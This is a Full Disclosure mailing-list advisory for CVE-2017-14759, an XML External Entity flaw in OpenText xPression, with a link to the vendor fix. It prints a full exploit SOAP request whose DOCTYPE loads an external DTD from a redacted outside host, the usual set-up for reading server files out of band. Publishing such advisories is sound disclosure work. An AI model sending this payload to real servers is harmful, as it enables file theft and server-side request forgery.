lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAGOhvv+SMoLWXh+r8ZE2A7CK3qBwhZm9ASq4KyxWGr+sZLeRHA@mail.gmail.com> Date: Wed, 27 Sep 2017 15:59:27 +0200 From: Marcin Wołoszyn <mw@....pl> To: fulldisclosure@...lists.org Subject: [FD] OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) - XML External Entity Title: OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) - XML External Entity Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14759 Affected Software: ================== OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) Exploit was tested on: ====================== v4.5SP1 Patch 13 (older versions might be affected as well) XML External Entity: ==================== Application XML parser is accepting DOCTYPE in provided XML documents either directly or indirectly, using URL. This can be exploited in various of ways, e.g. to read directory listings, read system or application files, cause denial of service or issue requests on behalf of server (SSRF). Vector : -------- POST /xFramework/services/QuickDoc.QuickDocHttpSoap11Endpoint/ HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "urn:publishDocument" Content-Length: 13689 Host: [...cut...] User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: close <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.framework.xprs.dsc.com"> <soapenv:Header/> <soapenv:Body> <web:publishDocument> <web:requestContext><![CDATA[<!DOCTYPE m [ <!ENTITY % r SYSTEM "http://[...cut...]/m.xml"> %r; %i; %t; ]><RequestContext> <Credentials method="UserID and Password"> <UserID>[...cut...]</UserID> <Password>[...cut...]</Password> </Credentials> <ApplicationName>ELease</ApplicationName> </RequestContext>]]> </web:requestContext> <web:documentName>[...cut...]</web:documentName> <web:customerData> <![CDATA[ <root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="C:\xPression\CustomerData\Schema\eLease_v0.3.xsd"> <eLease> <PrintStatus>Final</PrintStatus> [...cut...] </eLease> </root> ]]> </web:customerData> <!--Optional:--> <web:outputProfileName>PDF w Draftwatermark to File</web:outputProfileName> </web:publishDocument> </soapenv:Body> </soapenv:Envelope> Fix: ==== https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 Contact: ======== mw[at]nme[dot]pl _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists